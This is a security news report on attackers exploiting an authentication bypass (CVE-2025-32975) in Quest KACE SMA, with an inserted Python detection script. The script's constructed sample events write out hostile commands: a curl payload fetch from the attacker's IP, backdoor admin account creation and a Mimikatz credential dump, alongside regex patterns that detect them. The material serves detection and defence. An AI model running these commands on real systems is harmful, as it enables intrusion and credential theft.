
According to Arctic Wolf, attackers are suspected of exploiting a maximum severity security flaw affecting the Quest KACE Systems Management Appliance (SMA).
The cybersecurity firm said it observed malicious activity in customer environments starting the week of March 9, 2026, consistent with the exploitation of CVE-2025-32975 on unpatched SMA systems exposed to the internet. The ultimate goal of the attack is unknown at this time.
CVE-2025-32975 (CVSS score: 10.0) refers to an authentication bypass vulnerability that allows an attacker to impersonate a legitimate user without valid credentials. Successful exploitation of this flaw could facilitate complete takeover of administrative accounts. This issue was patched by Quest in May 2025.
In the malicious activity detected by Arctic Wolf, the threat actor is believed to have used this vulnerability to seize control of an administrative account and execute remote commands that fetched a Base64-encoded payload from an external server (216.126.225[.]156) via the curl command.
The unknown attacker then proceeded to create additional administrative accounts via ‘runkbot.exe’, a background process associated with the SMA agent that is used to run scripts and manage installations. Arctic Wolf also detected changes to the Windows registry made via PowerShell scripts, likely for persistence or system configuration changes.
Other actions taken by the threat actor are listed below.
- Credential collection using Mimikatz.
- Discovery and reconnaissance by enumerating logged-in users and administrator accounts and running the “net time” and “net group” commands.
- Remote Desktop Protocol (RDP) access to the victim's backup infrastructure (Veeam, Veritas) and domain controllers.
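The post-exploitation chain above (runkbot.exe spawning curl and account creation, PowerShell registry writes, net time/net group discovery, Mimikatz) can be turned into process-creation detections. The following is an added example, not Arctic Wolf's or Quest's code; the event schema (parent, image, cmdline) and the sample events are constructed assumptions, and the defanged server address is the one quoted in the report.

```python
import re

# Constructed process-creation events (not real telemetry); the parent/image/cmdline
# fields are an assumption modelled on Sysmon/EDR process-creation records.
SAMPLE_EVENTS = [
    {"parent": "runkbot.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c curl -s http://216.126.225[.]156/p.txt -o p.b64"},
    {"parent": "runkbot.exe", "image": "net.exe", "cmdline": "net user svc_kace Pass123 /add"},
    {"parent": "runkbot.exe", "image": "net.exe",
     "cmdline": "net localgroup administrators svc_kace /add"},
    {"parent": "runkbot.exe", "image": "powershell.exe",
     "cmdline": "powershell -c Set-ItemProperty -Path HKLM:\\SOFTWARE\\Example -Name Run -Value x"},
    {"parent": "cmd.exe", "image": "net.exe", "cmdline": 'net group "domain admins" /domain'},
    {"parent": "cmd.exe", "image": "net.exe", "cmdline": "net time /domain"},
    {"parent": "cmd.exe", "image": "mimikatz.exe",
     "cmdline": "mimikatz.exe privilege::debug sekurlsa::logonpasswords"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},  # benign
]

def _r(pattern, text):
    return re.search(pattern, text, re.IGNORECASE) is not None

# One rule per behaviour reported by Arctic Wolf; each is a predicate over a single event.
RULES = [
    ("sma_agent_spawned_account_change", lambda e: e["parent"] == "runkbot.exe"  # agent -> net ... /add
        and _r(r"\bnet1?(\.exe)?\s+(user|localgroup)\b.*\s/add\b", e["cmdline"])),
    ("sma_agent_spawned_curl_download", lambda e: e["parent"] == "runkbot.exe"  # agent -> curl http(s)
        and _r(r"\bcurl(\.exe)?\b.*https?://", e["cmdline"])),
    ("powershell_registry_modification", lambda e: e["image"] == "powershell.exe"
        and _r(r"Set-ItemProperty|New-ItemProperty|\breg(\.exe)?\s+add\b", e["cmdline"])),
    ("net_discovery_commands", lambda e: _r(r"\bnet1?(\.exe)?\s+(time|group)\b", e["cmdline"])),
    ("mimikatz_credential_access", lambda e: e["image"] == "mimikatz.exe"
        or _r(r"sekurlsa::", e["cmdline"])),
]

def match_events(events):
    """Return (rule_name, cmdline) for every rule each event triggers."""
    hits = []
    for e in events:
        e = {k: (v.lower() if k != "cmdline" else v) for k, v in e.items()}  # normalise image names
        hits.extend((name, e["cmdline"]) for name, pred in RULES if pred(e))
    return hits

def triage(events):
    """Escalate if the SMA agent created accounts, or if three or more distinct behaviours fired."""
    fired = sorted({name for name, _ in match_events(events)})
    return {"rules": fired,
            "escalate": "sma_agent_spawned_account_change" in fired or len(fired) >= 3}
```

On the constructed sample every malicious event fires exactly one rule and the benign notepad.exe event fires none; the runkbot.exe parent condition is what separates normal SMA script execution from the account creation and download behaviour described in the report.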
To mitigate this threat, administrators are advised to apply the latest updates and not expose their SMA instances to the internet. This issue was resolved in versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).
